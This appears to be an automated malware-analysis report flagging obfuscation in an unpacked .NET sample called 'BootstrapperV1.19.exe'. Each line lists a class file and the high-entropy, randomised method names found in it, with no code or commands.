Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, loak9tDTx8UxwNx0SXy.cs	High entropy of concatenated method names: 'method_0', 'h59', 'R73', 'MrbD4rjaBC', 'W1BqZbdNDJjOR88mGVQV', 'DQIIXjdNLJL0Ko7qwjab', 'NTdKtPdNN8Geuahw8vtM', 'QXrUrPdNXM0uLAX0tgVS', 'jApUCLdNQLlgbXg5LdoJ', 'T2861ZdNaAsZhN56VnpW'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, yV4CUEeoo52WkeWC1ZZ.cs	High entropy of concatenated method names: 'uuXeDMOVIU', 'uVoeLgHtaQ', 'sGmeNW655E', 'fyPeXavRIR', 'JIGeQ01Owk', 'RKpv58dANDtwPc6QkTR1', 'msRAsXdAXny0CueOdN3C', 'JUUjkWdAQ2kdCl2yTBl6', 'XcROWRdAavJLM4v6ZE3H', 'VUI8YWdAxqhC48bnXneK'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, eTPltgCT8NS7aqQrvfj.cs	High entropy of concatenated method names: 'NlrC4k7Yin', 'ABaCsapj7L', 'PObCnSpy0F', 'ypoC3xgL6J', 'zteCmbm91o', 'fHZCC8tJ3C', 'yV3CVvMJSM', 'gcjC57N3hx', 'kOPCEL2pnN', 'bslC9ysoEj'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, EbEKDRZTNxx4QvphlqR.cs	High entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, NyHUmVjA6wwfYZYxlpK.cs	High entropy of concatenated method names: 'TagjO4edcT', 'Lc8jBJmKTe', 'abljUk95ur', 'jjYBDqdESBQOD9YODiWX', 'FG5T7jdEekZas5JLIXMC', 'xanyiOdEHLGabC255Tgq', 'sZhpiAdE8dqPeTMOY8PV', 'sUmLjndEgqZK6oAK7piU', 'TkXUBMdE7MwmbWtvk1xi'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, hR3CLFzffFD3QIInCq.cs	High entropy of concatenated method names: 'j8XddAqBwe', 'NNud2I7Vhq', 'a25dJy7S94', 'DlldGGVCGl', 'FjwdcrPLG3', 'OdndkKNB7O', 'gHudMN9oLn', 'bZ7dgmdgMDVmLcI5lA2C', 'lrONiKdgfrIka86ZRZjF', 'xA7PZjdgPrx7hpCcHwgU'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, FEaxvtRDwjTdbLI3Wqn.cs	High entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'jRBdlvGUv4y', 'MNtdJONXRvO', 'F3Puued5ZkHYeNFirym9', 'x8imbpd5YPMtRksKgYqp', 'lON3vmd5TqnPlvH6yVSK', 'Mwb6VOd50P8D7o7OFvNl', 'fM8EGed54XSd1VpKkGxf'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, jf1scMRCdWpEXADMYhS.cs	High entropy of concatenated method names: 'EaKROkdaRI', 'ImuRBeNqsa', 'GstRU55txo', 'vV6VfDd5yi4L07AxEf4g', 'jZPLyjd5R1EdNVEZUPki', 'oIwVGMd5jkiTiCy7E8gi', 'T0yR5h7Qay', 'OuoRE2rf3V', 'KraR9Ax2iu', 'xci2YNd5bYGRcEs44eAE'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, Er4GOj2rNOLEknahGv8.cs	High entropy of concatenated method names: 'nD2J2hHck3', 'Fm6JJ4pMUU', 'akFJGO3bgX', 'vqw1lVdYMSx1DqTom8jV', 'kG4AbxdYkfM3aoVGjvBG', 'RjWfHldYl8NryPq9N3wx', 'lsbvwJdYfCuK36aQApp3', 'pS3JPbQrj4', 'wP1MhpdYqeF0w4QLs7CR', 'ESG1CidYvnsAvy0BrYDy'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, YyUFRcgEUIxexsDWZSj.cs	High entropy of concatenated method names: 'YWOgaeB02B', 'fd3gzbnG1a', 'rTBgA1OriZ', 'dM0gKlBkuV', 'FklgOeLJW6', 's2HgBs6Qru', 'lPDgUc64vp', 'c05gWUEvGW', 'MDDgrBwwAd', 'Xj7go5mkYv'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, zFEf6YkE0TMRWDU97ss.cs	High entropy of concatenated method names: 'RkkkNahRtT', 'n6YkXihCyN', 'I4dT1adskIwsw7splHZo', 'TLGVNKdsGGNARB7UHt5I', 'cFtecMdscw06DGFVn0Tu', 'QLVNWDdsljfR67fbcOhp', 'KEukAivcw4', 'oaykKNWZIO', 'SEJkOOB0Vw', 'LUfkBZuoIn'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, JT62JOjWc9uMeTVf07m.cs	High entropy of concatenated method names: 'NUJdlbuN9Ol', 'g1LjoXTdWb', 'iJAdltt4V6i', 'uQmD59dE0JOYe5nlDnwf', 'yKIaIBdE4FhkB1ZXxguW', 'vh84uAdEYChIpaqpu0S7', 'yWSXDTdETBop7CNW86N2', 'I30UsudEsRYGs87c47es', 'JqQapUdEnQXYRMvX87c9', 'NhR2QNdE3qsGWUX4YntC'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, khav98MeJKByOr3MWtX.cs	High entropy of concatenated method names: 'I6wCMXdmBXdLZ6KUWbMr', 'MXM7VrdmKynWY7wFrPBQ', 'SKeWPtdmOmbFwfWJtcSn', 'sRWme0dmUNqmilT425WL', 'unJhxRaXOg', 'R4raj5dmrhZZid09LnZb', 'PasrtNdmoU5AdWWXyvUj', 'CUWboXdm1m2UkZxrIxDq', 'xk4FdKQf2h', 'AblsWPdmXQqD6UO8yIis'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, ay5DJ3TQEZmnX7x8PQF.cs	High entropy of concatenated method names: 'Jw5TxqoA5D', 'JrPTzuXyIM', 'aU60ifqfWt', 'Pjy0doo0x4', 'jcn0wd53CT', 'aRN02JT2XA', 'Rpx', 'method_4', 'f6W', 'uL1'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, t50OvVlOQ3yDHAC6JcS.cs	High entropy of concatenated method names: 'mYYlNT7xEb', 'Yp7cl8dnqDLibJh4GcGC', 'JMMAMYdnvwS6eTQ7ONmg', 'F0btoSdnh7fJQUC1LKs5', 'P9X', 'vmethod_0', 'zU6dJgZsu3f', 'imethod_0', 'Gw03ZXdnMAI3n6nMHS6s', 'RnH8VndnkYT7DwMjILYw'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, v9AUSXkdhdt4QKnuNxW.cs	High entropy of concatenated method names: 'juLk24pjcu', 'X9ukJuxVqo', 'pGEkGTu7TQ', 'p9hGELd4fdn1ueFmgy0R', 'AyrCs3d4lEyHVAURdbFh', 'KaSQemd4MuuAIDq53QQg', 'N7di5wd4PYZt3vNeKg0k', 'LoHpS1d4qlbZtLbwdDP9', 'QKVVjfd4vbfoqal32Spw', 'CixjSYd4hJxPJLMMXtZj'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, OP96RIg2EGMkavblGoy.cs	High entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'WStgGQPXSt', 'Write', 'DcegcG9vBQ', 'QUIgkps8mR', 'Flush', 'vl7'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, OjHp06GMW9cD1ZIZXtx.cs	High entropy of concatenated method names: 'Rpx', 'KZ3', 'imethod_0', 'vmethod_0', 'UqhdlGufL3w', 'RdIdJdHUcs6', 'jsV8EldTjg10p1tGoUlF', 'EgAcLFdTylfE3nukL8Dt', 'qVQcGydTISJwtes0Yq4d', 'IqnvyFdTp73BSQNJ3UOK'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, FcGsnWyPsZc89kjZ0T2.cs	High entropy of concatenated method names: 'Rrr', 'y1x', 'pTwdlIFkwTZ', 'aXZdlpMcTr3', 'ogxldmdEzFameoZ0YAac', 'zonkAcd9i19ixTw9A5bH', 'EHaFItd9dLELtgto9P0T', 'Ms9uxUd9wDDO0AMPLfjw', 'kRNPIMd92nHkCXHMvXkm', 'Wy3BQFd9JqpEjWYZMcV7'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, vFKDAHNTFQP6MkldX87.cs	High entropy of concatenated method names: 'EYiN4Mgygt', 'pjoNsANVVL', 'rLJNn9mJxu', 'GyXN3rjedZ', 'Dispose', 'vpP0xFdQYDCOmjUvhRx1', 'gc7YAsdQ7c3Guaqe2TKU', 'OUspJPdQZ2FccvTQQnYm', 'biyXifdQTdBPMBUM6GRa', 'rMt7l2dQ0nV9LJU7LQgh'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, EeaICIlf9e3B4G7DvJ9.cs	High entropy of concatenated method names: 'giWlqY9YZM', 'Xo8lvulIOm', 'rHLlhbr7o9', 'bFeY4fdsyYlnFJaZ5gFR', 'YTEoPadsRKk47lS2h6Ip', 'IHDEGOdsjrAuc7JFsdgF', 'PUsgfjdsIoQHih72tNCj', 'yYYCwLdspywDvkU6SWFN', 'uHOxx5dse5AYgykAyh4Q', 'Tc0xNSdsHR8UqE6IX2q8'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, jkZxXcdu6Iht96a3jQm.cs	High entropy of concatenated method names: 'RTM', 'KZ3', 'H7p', 'eeS', 'imethod_0', 'XbG', 'fO3dkz9xsvJ', 'RdIdJdHUcs6', 'GL4TrldgeZUaDRow22mw', 'snj3EodgHtXbybSeEtXT'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, qbPQRhMwJitwKnXPc4e.cs	High entropy of concatenated method names: 've9MJqcPeO', 'GZXMGeOmhx', 'xvKMcBblgA', 'REhMkBXhaG', 'UFBMl62TdN', 'L0RMM4qrKo', 'PZPMfYXNvb', 'on0MPTC3T6', 'MMEMqHyabt', 'zFIMvE8sOP'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, GMK2LDcEY7p5xj7C0g1.cs	High entropy of concatenated method names: 'lQAcNVPr6s', 'bZpcX4Ewg9', 'gSJcQYih9X', 'lG4ELad4G3QTcA3edVqN', 'kV7mORd4cyTKifXB6fqw', 'OqomQnd42Jauw8MbpaJQ', 'pGNBhnd4J717D01jQtcl', 'p3vcAsnCi2', 'WdscKOG6hw', 'no0cOZmwXu'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, H7jhjHNv8pAZEB7ciLL.cs	High entropy of concatenated method names: 'HbjN6cZn4s', 'X62NR53r8v', 'm1aNIBt8bC', 'eUVNpCXgVb', 'lVBNeSGZDa', 'VIJNHCcuat', 'cQENS3uTYZ', 'QqwN8y6DZX', 'Dispose', 'ahnkIBdQIAVEVg5qbDgE'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, XBuOgyl5H5jbr8ZX7y8.cs	High entropy of concatenated method names: 'P9X', 'Yf5dlqpRwvl', 'imethod_0', 'qeKl9qXkLR', 'plAt6Mdnd0P742N1AkJG', 'E18aaSdnwG3tEXGaFZMp', 'ufbiLpdn29wOnUwpTHgN', 'bsI2KAdnJyp7kxT2rVKO', 'M6lYVfdnGXIyD1KOmahv'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, PLEunsaVTgxTC7esIAM.cs	High entropy of concatenated method names: 'EQCdc0CZhit', 'GMFdc4autED', 'VwZdcswxW2X', 'rFndcnpbOQS', 'nYfdc3ZFgFQ', 'JHidcm0SSUh', 'ooKdcC5ogBY', 'dr5xGyNpMx', 'ntjdcVI0bdG', 'whidc57Nr00'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, UK3l9KMhXcMyaS2MeSI.cs	High entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'YTSmdidnCmfvLkpU0Eig', 'L9pB5cdnVnGw0qFIMRSg', 'TrYPEAdn5t9kiPiCsfL6', 'QFeM6jHPof'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, V66tPwIvgKLx6WLHXAJ.cs	High entropy of concatenated method names: 'g7HedS2753', 'N17hkSdATAHedBxyhPTx', 'WyGssRdAZfqO12OvXmfu', 'QEGmp4dAYmwAOdTiE0Hm', 'gsdDSRdA0rbPbrEeh03h', 'F8hIFRVv3d', 'fcnI6ivofo', 'R2mIbrH0si', 'lJqIt84lbW', 'cW7IuPxp06'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, zX9bkRJVRjNjNGQ8QxI.cs	High entropy of concatenated method names: 'SWpJaKIxCj', 'LiesgndTkxE4o2gZLHqQ', 'p2nFCgdTlalwG2pxXyNr', 'Fj0fT7dTGZcPYfNsipYP', 'BfBdmJdTcbBl5PB5HSs8', 'IAxk9udTqoelGMC16YTB', 'KILVvedTfSaaD5jqjUgB', 'YGIAewdTPmjH4jHYcCdx', 'VNys4qdTvqjnLMTkPZWb', 'vIDGcd3JgV'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, nmHayoR7JAXjUvgvraw.cs	High entropy of concatenated method names: 's8bR3NyY5C', 'WFYUymd5hLRV5ft1t28p', 'MD5ssid5qCEI4D6A20g7', 'AlqunJd5v0NBgq8O6Q0I', 'F3GwWXd5Fni4vRSH3fer', 'mRARYZaeXk', 'yXwRTYQa4W', 'eWKR0XWfHE', 'E7HTlTd5lI4lItxeXH7v', 'bvL3ncd5MCT644nJ0l2p'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, i2xKQZy6LWXBs45htlM.cs	High entropy of concatenated method names: 'h3GYYqd9Iw0GtQ8ajRM4', 'LvK723d9pDEvLPnseali', 'VIOmXRd9eMMxo6eJRqwS', 'mnLhN3d9jrfK5JCJYVeh', 'vvNyBed9yl3LOi5coCB3', 'method_0', 'method_1', 'indytMkwCD', 'yP4yuZYQE4', 'BSRyRakilt'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, VegtO5jCdOgBIJmSpaq.cs	High entropy of concatenated method names: 'N2N', 'TwQdlFktXqi', 'dKNj58Tu94', 'cKbdl6DrDEJ', 'OKltWfdEjfQMgR94qNoy', 'HlmwpldEutYBZWRRMCpf', 'S3nE91dERqdRUM09mZJL', 'bBM1IpdEyxB0tKC3l5Is', 'OhOPikdEILGDUcaD2NKg'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, xGLaw6lgGrNw7bllSAg.cs	High entropy of concatenated method names: 'NfxlZQpUCq', 'Yx2lYdMcNV', 'QirlTSep4J', 'UrOl0Un0a3', 'amEl4p0pLL', 'EBplstJqbO', 'pWpU7yds1EjK0KIW6FPI', 'XMECJXdsD1ZIA68OFH8A', 'S6yeqndsLX98GoGKUms8', 'kFFM44dsN4OQe3XDcqjp'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, mjhLR2CMZWkQO0T3JbG.cs	High entropy of concatenated method names: 'CJiCHuEGdB', 'r3TJUddDSZlU6dDX92it', 'd6UGIidD8F5Wc4O6Ujsk', 'XTP28RdDeaR33GKpv5Vn', 'pajHaIdDHb3qYrj24ctv', 'IPy', 'method_0', 'method_1', 'method_2', 'vmethod_0'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, JlDk22auikPg5UGbLQT.cs	High entropy of concatenated method names: 'lVsaZ78Onw', 'iqqaYtxujf', 'eWjaTOOUbU', 'Hiqa0XSTqL', 'FmAa4Xqkfn', 'DSyasJksAg', 'EvEanbAD71', 'eq6a3kjpxg', 'ILhamX7Qk8', 'GbQaC4s5C4'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, B2NvOMXtqVYtZCRbgnc.cs	High entropy of concatenated method names: 'iwM0ygdaRZjMDwfTIMQD', 'Ooh15mdajp7V070IkIh5', 'OihQDQMfs5', 'vEfVOydaeB9gu5sj3rYh', 'eMJU00daHV1Jc3QgrGvM', 'HmhNWfdaST87w49vU2Co', 'XWsbPpda8ww1tShwSIg2', 'xYEYJBdagVtrdJ0I5osS', 'deOJD4da7TGCTmPBHFVp', 'fvRgV9daZHCnj90AeSJO'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, QQBOQAsmMbpqfSQE3Kc.cs	High entropy of concatenated method names: 'q13', 'Sw1', 'method_0', 'pOosVfuC5e', 'L0Qs52dQqQ', 'SKHsEsArDe', 'Y6cs95D3O6', 'PXJsAMrUfW', 'ErksKjkIKV', 'pngBUFdoQXWXWZOyvsq2'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, m6xtDbHAmLO2y9IER4J.cs	High entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'GrsHOmT8pb', 'gpOHBfviuN', 'Dispose', 'D31', 'wNK'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, doLl3eVTPcF7rnjVMeV.cs	High entropy of concatenated method names: 'gTSV4xOl5F', 'M8WVsvwxWg', 'n4rVn0N3Ik', 'AywV32nwhm', 't5EVm3w8ce', 'RFXVCxla9w', 'LKMVVeRiTk', 'QBmV5AJpSs', 'bfaVEEyvfI', 'BhpV9axX35'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, EalZ7BlbUO2J6AS5b4Z.cs	High entropy of concatenated method names: 'NYjljaWZmc', 'NAQrt6ds4iqFqDhHvH8x', 'z6Cm2hdss9ZneKM4EcYb', 'eAFlhMdsnO6jvLZCIl28', 'AdMlueSPnr', 'eJ1swNdsZjOZ4IdmFNne', 'M33eJQdsYVX1wfs7DsGc', 'tbs51CdsTMo5DVyVkRBU', 'vnHH64dsggIuAfp5rVIy', 'Rg5ynTds7YNGEc2g0KmN'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, U4KgmN7xttD1DJcM8UX.cs	High entropy of concatenated method names: 'dmiZiVYSRr', 'SjFZdZHsEI', 'JrbZwVd7wn', 'akxZ2Cfc0v', 'BtnZJdx7na', 'fk7ZGAMZc1', 'qDwMiOdUwOl9euexLq5d', 'Gp2mFpdUic8k22v2nydN', 'sesDZXdUdZ9cDQ6Du5H7', 'fc2019dU2ByDB920Q4yg'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, BrafOi0ya2QydcUhBab.cs	High entropy of concatenated method names: 'lFO4hLEqc8', 'RVvEpHdraC8187wOxDOb', 'R4vb8ldrXCL2jtiDPNoL', 'Ri580OdrQ77tk5iFUlac', 'eyTRvGdrxvG8l5NthW4D', 'kt5', 'aMo0pTeowV', 'ReadByte', 'get_CanRead', 'get_CanSeek'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, qaWcFq4n4HNWO8L1XHI.cs	High entropy of concatenated method names: 'Close', 'qL6', 'Nf54mQ4Svt', 'kph4CAdQxW', 'zjD4VWObcE', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, yySYoC3nd1ijaqoEl2D.cs	High entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'tQVwCtd1ED0dq5J9yjjg', 'zJoWl2d1VgGaQM8Njur6', 'Oacqdid15Lxrb54wBNXL'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, yLIb7h4rWHmVLUXo7uJ.cs	High entropy of concatenated method names: 'mA441i5XN9', 'k6r', 'ueK', 'QH3', 'UrO4DS22NO', 'Flush', 'xiE4La825r', 'CUh4NP3sod', 'Write', 'yQP4XAtlMQ'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, MIvnTjwTLZARjr44QSO.cs	High entropy of concatenated method names: 'sxCwEGIYqX', 'aA4w9RBBvv', 'VTnojrd7E2DmhTnarguc', 'dDt7k5d7V0PvQcCRxKU4', 'iTEPeDd75jFy2avnO08G', 'iSUwB98pHY', 'V2627Sd7OqvY71xTZbSb', 'PELVkyd7AQ741fsReymY', 'NrGxJ1d7KQjxOVFR1jBH', 'RhsHY8d7B6pSlRjtAqmH'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, PfNvPu8Tb89hDJp81qR.cs	High entropy of concatenated method names: 'method_0', 'xGy84J6693', 'kGa8suN0bX', 'uQ88nRqIP2', 'Yjd83KPIWs', 'D1b8mPPAby', 'Ktf8CwVvOu', 'D5B0C8dO7wGNZEOYKFnZ', 'DNEXjEdO85pIPEgmrLh3', 'ubtqjHdOgS47G6qyGPKP'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, s2aXaH8P2WkOyOTibFy.cs	High entropy of concatenated method names: 'J168vxjr7R', 'Lsx8hbTQ4E', 'wjq8F9iSb4', 'rCu86bPoqH', 'll08bMbN8F', 'M0NMcKdOtxyg8OLpLnCZ', 'JqQtuOdO6rST6L8FhOTi', 'HSZFrTdOb7dJr1d444ul', 'p3R2TcdOunJK7vCk7vFB', 'wBW0TmdOR6WKsyroxDur'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, Ta0XuJXiMFlHqPlBFM8.cs	High entropy of concatenated method names: 'YDxXJ69STs', 'yoNXG60Oku', 'EnqJrfdQzGrSZYhflsgV', 'BZwoCvdaih1g5Z0BDTHW', 'xqfZWgdQaqBPRL44tVeE', 'zEu9BsdQxaKYSSvKnrvg', 'vg99vqdadcksWd9gELEx', 'EB3ZWFdawJ7vMEAQE6P3', 'X7VXwDTV6F', 'vsjIxSdQLsEU2AtYAWsr'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, EdrHUOdD3767aAtplnG.cs	High entropy of concatenated method names: 'P9X', 'K8PdNSUFoP', 'stqdliXCtro', 'imethod_0', 'q5KdXM501E', 'HuIBqqdgNXaV0YQU2y6w', 'd5oQjjdgX7VCdD7mN6wb', 'LD3nBMdgDrRPgTuKyFYL', 'EfO9vKdgLBmnW8kU1MWE', 'n5yDdtdgQ7UHjtfvvude'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, zUlUd628L9Le5To4ZdW.cs	High entropy of concatenated method names: 'Bw329v1Gcp', 'zTv2A4cDlk', 'GnY2KOdSqJ', 'OiM2FSdZUGUeVX0vGGFn', 'UgosVidZWWuGDEAH6MTD', 'LYJE1LdZORJMerOGGGK4', 'hQipHtdZBejjjwbq2C80', 'awV27yYpmp', 'QvX2ZGrfeX', 'lWb2YnGtLL'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, YNGwJqSeY8kjoKUU1l6.cs	High entropy of concatenated method names: 'PAsSShSJqL', 'wVYS8AVjhb', 'P25SgMATsr', 'fbiS7Xj0lo', 'QT8SZWH5q2', 'LVHU3edKak4k3WE5SxPf', 'S2PQlsdKXGwJBqCsJyua', 'lN9IeZdKQS3uJOXK3sVm', 'fxnfCadKxiL0UFMW6iYR', 'uQ6JAxdKzDfbGap1xV4C'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, xCO2BB5nJVkEtQqDNLH.cs	High entropy of concatenated method names: 'VZld96dNwyfP0XEsZW8o', 'HdWU7VdN2noavTH0Ughg', 'hRZD7pdNiUFeQPQmOYgg', 'SjiSSqdNdluu7lRwLbGQ', 'xmPP3JdLQeIQjlEpaQM9', 'Ux5jcqdLaVE2qKyZw5N2', 'ABK9LQdLxbhR5Zy6Qtv0', 'HhhJP7dLNpY3grvB3HOd', 'RABrktdLX80jWEZ7GswM'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, UD4mFCGAo7vb0RxfmUt.cs	High entropy of concatenated method names: 'GWrGWAW1F8', 'Hueafbd02PlYMhxcK7gs', 'u61PQ3d0JNTj88gWatox', 'MHtCYMd0GNVE2RAwR5q8', 'MKsTQBd0c1kM5IYiY8Lc', 'U1J', 'P9X', 'VekdJ647Dmw', 'GjLdJb2Jcuk', 'lB0dlkKv4pN'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, j71P4oefSb4Iv6t4d2y.cs	High entropy of concatenated method names: 'vMUeTpgKMB', 'mapeqoQpeg', 'ly9evXavH4', 'bI5eh189Zm', 'quZeFQ02mB', 'NYFe6YSFnu', 'MhFeblqJkt', 'q9ketDIxAM', 'bYaeuN6v3m', 'VegeRrZaCf'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, q09YkfdxV56aurjHkcj.cs	High entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'JnOdldkrKGw', 'RdIdJdHUcs6', 'VxshPjd7i4HiT08bcDmm', 'DZsASfd7dQt9gIlh9dqZ', 'hTjYBvd7wQheaIPOZNl6', 'kCsgTed72snWpqfej6by'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, rqXwHswGHI7vPCkdsB9.cs	High entropy of concatenated method names: 'jGWwk9xhxL', 'GF3wlTa1j2', 'bRQwMOeac7', 'xsXwfqej8S', 'VPhhvrd76hjhD1mrpp4k', 'k6lPEPd7hUJjYutLgFSH', 'OvYk1Dd7FMWLMPX8mtRL', 'Ue6IcGd7brB2mfjN6oA6', 'yXnoqpd7ticXM6mWjB3e', 'LrrPFCd7uALdyLhwHIPY'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, P1ALIswj8p6Y5vEnri1.cs	High entropy of concatenated method names: 'AUSwIU17wQ', 'MIZwpytAfE', 'Pk4PIxd7Z8Zumx7kcfTQ', 'tWcsGGd7gIFesXqItuRJ', 'TkoQbId77OZWjXO7VE3p', 'nfDQSBd7YhxExHha7bpI', 'v2f6Hpd7TCiY9VJUxAjC', 'KX2sJCd70FXPsY3LLZSi', 'A9FtR5d74tTCpZmhtv6t'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, LlLKQn71aVmc9JVx6ss.cs	High entropy of concatenated method names: 'fm07LtW1Ee', 'PLW7NjNorw', 'PXN7X2oKeL', 'oIN7QN0FfI', 'syN7aW7rlt', 'p1BfR7dBNONJlPyDtyEQ', 'GQdKZ3dBDHJWrlMu4tG6', 'eAsm1ydBLnGNXnmZ4BT0', 'SdAtaDdBX1PFdvIwq1OZ', 'HI2H0edBQjFgDYrGlSyR'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, bNTRJ3srWwX2TLEWO1h.cs	High entropy of concatenated method names: 'YT6bwfd1FNj2CLVWSewq', 'PmGBlCd1vEGTv4qedXcJ', 'cU47t1d1hr4l97cCaMQN', 'nXlJUfd16BxFgBXQxyIP', 'KAas1HcMla', 'Mh9', 'method_0', 'J2AsDwc4Bd', 'hjXsLSEiWT', 'OV9sNR7syA'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, Ca29H4wrWuOnYGI7ufA.cs	High entropy of concatenated method names: 'RAc2kXnqD3', 'gmIqkKdZ2QxfJL9a4hGB', 'K9qDYwdZJJ33EK1XuPVg', 'bjDQiYdZGuwoev0o7J9l', 'mExsJgdZcyh9Hvsv5Db2', 'hGacMIdZdSq0xDhpyWS9', 'WXjbFsdZweENJi62S7Yu', 'nSDIvEdZkIPraT1wcqvO', 'olI2ifJwVJ', 'Def2wDRTab'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, W0oqHaYJi0X4y3dgfHf.cs	High entropy of concatenated method names: 'kgyYcSeyMr', 'xoXYk0iCH1', 's9QYlOip6B', 'method_0', 'method_1', 'Fc2', 'method_2', 'method_3', 'DB1', 'uUbYMyOABu'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, qO2H4fJ0BQS3WXlNP0W.cs	High entropy of concatenated method names: 'KZ3', 'imethod_0', 'vmethod_0', 'JMKdlJ6cXUF', 'RdIdJdHUcs6', 'L79Eg1dYnuhUk3dbgb01', 'dxEyxLdY3Sf36lQ4Rlu5', 'Qb9abSdYmY9DiKsM61NT', 'LlWriqdYCCZufZWejjBy', 'OFvJRbdYVYfVCEdpGS2Q'
Source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, D3KXRsDmtylPWFs6gBf.cs	High entropy of concatenated method names: 'eZudl8U33TV', 'g9EdcSg6qtI', 'cS887ydXpyrmfd1M0Jm7', 'ppfiUGdXycx4xRAlo8KY', 'pXWOTedXIZVpTAZYnuHM', 'J4kaZudXeKJSZIeVhIPX', 'q3LKeLdXSjN4bmL7Ho2Y', 'MgEdAadX8iXoI2ebN1U5', 'imethod_0', 'g9EdcSg6qtI'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, bFs94RCKTmRTLfvTG3K.cs	High entropy of concatenated method names: 'syOdlHiKwqQ', 'iOxCBNnObh', 'JnnCUeJaSJ', 'dfgCWKg0c8', 'TsO1gUdD3VKcAhIXq43N', 'd1BroZdDmCrkfjQFKOhZ', 'z3t6NWdDCVpS46eU18yT', 'BQufhadDVjKA6wjDOMqO', 'iLwxgTdD5dWCpswqqwlU', 'S0rZJodDEh5guqVAL4Sc'
Source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, Ms4tXKtiAVq9fuUYxX.cs	High entropy of concatenated method names: 'eMesUxePU', 'T1V4rLd80BcJcysQZZiB', 'tFlb8Kd8Yda0KlG8tdlo', 'OlCLRKd8T7H89xmfRNih', 'uUSRkVf9Q', 'YN7j7hhgy', 'boyykytcM', 'cCZIRkKJW', 'PQFpJ3oV7', 'A4ueTIuOy'
